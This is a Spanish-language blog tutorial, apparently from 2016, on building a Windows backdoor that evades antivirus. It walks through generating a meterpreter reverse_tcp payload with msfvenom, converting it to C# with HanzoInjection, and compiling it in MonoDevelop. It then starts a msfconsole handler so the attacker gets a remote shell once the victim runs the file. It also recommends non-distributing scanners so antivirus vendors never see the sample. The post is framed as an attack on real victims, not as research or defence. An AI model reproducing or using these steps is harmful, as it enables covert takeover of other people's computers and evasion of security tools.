Como HACKEAR WINDOWS 10 indetectable desde KALI LINUX

El otro día estaba jugando con un backdoor que era indetectable para todos los antivirus pero como hay personas que escanean el virus antes de usarlo al ataque, en algunos casos personas cometen el error de publicarlo en “VIRUSTOTAL”. Recuerda que es una empresa que reporta virus y lo compra a las compañías de antivirus .

Ahora te voy a dejar dos paginas donde puedes scanearlo y que no sea compartido para esas compañías de antivirus.

Screenshot from 2016-02-26 13-28-33Aquí puedes encontrar esta pagina se llama https://virusscan.jotti.org

Screenshot from 2016-02-26 13-28-27Tienes otra compañía que también lo hace. http://nodistribute.com

Este método vamos a combinar windows 7 con Kali Linux 2016.1 como ya saben vamos atacar windows 10.
Porque windows 7? porque vamos a compilar un .bin a .cs en el cual vamos a utilizar una pequeña herramienta que se necesita tener net framework AQUÍ

Primero vamos crear el backdoor en código binario con extensión .bin.

Vamos a nuestra terminal de KALI LINUX 2016.1

msfvenom -p windows/meterpreter/reverse_tcp lhost=(IP) lport=(PUERTO)4444 -t raw -o /root/Desktop/example.bin

En este caso lo guarde en Escritorio y vamos a usar SimpleHTTPServer para transportar el archivo.

 python -m SimpleHTTPServer 8080

Con la ubicación de la herramienta vamos a transportar el archivo y vamos transformarlo en .cs
vamos a descargar el archivo aquí 

Al Descargar el archivo lo vamos a descomprimir y vamos a usar la herramienta.

Screenshot from 2016-02-26 13-43-32
En mi caso lo tengo en la carpeta de descarga. Ejemplo

cd /user/CreadPag/Download/hanzoInjection-master

Y ejecutamos el .exe desde la terminal aclaro que tienen que colocar el archivo creado example.bin en la misma carpeta donde corre el programa.

HanzoInjection.exe -p example.bin -o injection_memory.cs
Screenshot from 2016-02-26 13-45-41

Ahora vamos compilar el archivo .cs en Kali Linux pueden seguir en windows usando Visual Studio o seguimos en kali.
Tenemos que descargar un programa llamado MonoDevelop

 apt-get install monodevelop

Lo descargamos para poder compilar el archivo .cs y al terminal nos ofrezca el archivo en .exe
Ahora vamos a abrir el programa

Screenshot from 2016-02-26 12-58-35

Creamos un nuevo proyecto en mi caso vamos a NET- Console Proyect. C#

Borramos el código del proyecto y copiamos el código del archivo .cs

Screenshot from 2016-02-26 13-00-39

Lo vamos a compilar y nos muestra dos enormes errores pero tranquilo vamos a solucionarlo.

Vamos a Proyect- General- al final dice “Allow ‘unsafe’ code” vamos a seleccionarlo.

Screenshot from 2016-02-26 13-00-52

Segundo error para la solución.

Vamos a Referencia editar y vamos al final a buscar “System.Xml” y aceptamos.

Screenshot from 2016-02-26 13-01-47

Ahora el programa va a compilar y nos ha creado una archivo .exe

Screenshot from 2016-02-26 13-57-28
Ahora simplemente vamos a enviar el archivo a la victima de Windows 10 y vamos a la consola de meterpreter.
Como ya sabes el mismo procedimiento.

 msfconsole

 

 use multi/handler

 

 set payload windows/meterpreter/reverse_tcp
 set lhost (IP)
set lport (PUERTO) 4444
 exploit

La victima le va a ejecutar el programa y simplemente no le abrirá pero nosotros vamos a capturar todo.

Screenshot from 2016-02-26 14-00-52

Screenshot from 2016-02-26 14-00-43

Como les repito siempre combinando muchos sistemas puedes armar una gran arma y recuerda “VIRUSTOTAL” es tu enemigo en el caso que programes backdoor.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s